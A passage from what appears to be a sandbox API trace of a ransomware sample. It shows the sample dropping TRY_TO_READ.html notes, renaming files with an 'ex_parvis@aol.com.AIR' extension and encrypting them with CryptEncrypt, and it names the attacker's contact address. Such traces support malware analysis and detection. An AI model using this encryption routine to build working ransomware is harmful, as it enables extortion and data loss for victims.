	[0107.528] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.528] WriteFile (in: hFile=0x5a4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.609] WriteFile (in: hFile=0x5a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.609] WriteFile (in: hFile=0x5a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.611] ReadFile (in: hFile=0x5a4, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x6f398, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x6f398, lpOverlapped=0x0) returned 1
	[0107.625] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.625] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.625] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", dwFileAttributes=0x80) returned 1
	[0107.627] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 82
	[0107.627] GetProcessHeap () returned 0x540000
	[0107.627] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0107.627] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"
	[0107.627] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.627] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.643] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a4
	[0107.644] GetProcessHeap () returned 0x540000
	[0107.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.644] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=654) returned 1
	[0107.644] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x28e
	[0107.644] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.644] GetProcessHeap () returned 0x540000
	[0107.644] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.644] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.649] WriteFile (in: hFile=0x5a4, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.650] WriteFile (in: hFile=0x5a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.650] WriteFile (in: hFile=0x5a4, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.651] ReadFile (in: hFile=0x5a4, lpBuffer=0x5db0d8, nNumberOfBytesToRead=0x28e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5db0d8*, lpNumberOfBytesRead=0x3a1f778*=0x28e, lpOverlapped=0x0) returned 1
	[0107.651] SetFilePointer (in: hFile=0x5a4, lDistanceToMove=-654, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0107.651] WriteFile (in: hFile=0x5a4, lpBuffer=0x3a20048*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesWritten=0x3a1f778*=0x28e, lpOverlapped=0x0) returned 1
	[0107.651] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0660
	[0107.651] FindNextFileW (in: hFindFile=0x37b0660, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.651] FindNextFileW (in: hFindFile=0x37b0660, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.651] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a8
	[0107.652] FindNextFileW (in: hFindFile=0x37b0660, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c44270, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.653] FindNextFileW (in: hFindFile=0x37b0660, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c44270, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.653] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b06a0
	[0107.653] FindNextFileW (in: hFindFile=0x37b06a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.653] FindNextFileW (in: hFindFile=0x37b06a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1
	[0107.653] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ac
	[0107.655] FindNextFileW (in: hFindFile=0x37b06a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c44270, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.655] FindNextFileW (in: hFindFile=0x37b06a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c44270, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0107.655] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b06e0
	[0107.655] FindNextFileW (in: hFindFile=0x37b06e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0107.655] FindNextFileW (in: hFindFile=0x37b06e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xe9f9cff0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1
	[0107.656] FindNextFileW (in: hFindFile=0x37b06e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c44270, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6c44270, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6c44270, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0107.656] FindNextFileW (in: hFindFile=0x37b06e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x968d5df0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xbee38, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1
	[0107.656] FindNextFileW (in: hFindFile=0x37b06e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x968d5df0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xbee38, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0
	[0107.656] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.656] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.656] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe", dwFileAttributes=0x80) returned 1
	[0107.656] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 90
	[0107.656] GetProcessHeap () returned 0x540000
	[0107.656] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x11a) returned 0x57fb28
	[0107.656] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe"
	[0107.656] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.656] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.659] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0
	[0107.660] GetProcessHeap () returned 0x540000
	[0107.660] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.660] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=781880) returned 1
	[0107.660] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xbee38
	[0107.660] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.660] GetProcessHeap () returned 0x540000
	[0107.660] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.660] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.660] WriteFile (in: hFile=0x5b0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.662] WriteFile (in: hFile=0x5b0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.662] WriteFile (in: hFile=0x5b0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.662] ReadFile (in: hFile=0x5b0, lpBuffer=0x23e0020, nNumberOfBytesToRead=0xbee38, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x23e0020*, lpNumberOfBytesRead=0x3a1f778*=0xbee38, lpOverlapped=0x0) returned 1
	[0107.694] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0107.694] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0107.694] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", dwFileAttributes=0x80) returned 1
	[0107.695] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 82
	[0107.695] GetProcessHeap () returned 0x540000
	[0107.695] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0107.695] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"
	[0107.695] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR"
	[0107.695] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.697] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0
	[0107.697] GetProcessHeap () returned 0x540000
	[0107.697] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0107.697] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=766) returned 1
	[0107.697] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2fe
	[0107.697] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.697] GetProcessHeap () returned 0x540000
	[0107.697] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.697] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.697] WriteFile (in: hFile=0x5b0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.699] WriteFile (in: hFile=0x5b0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
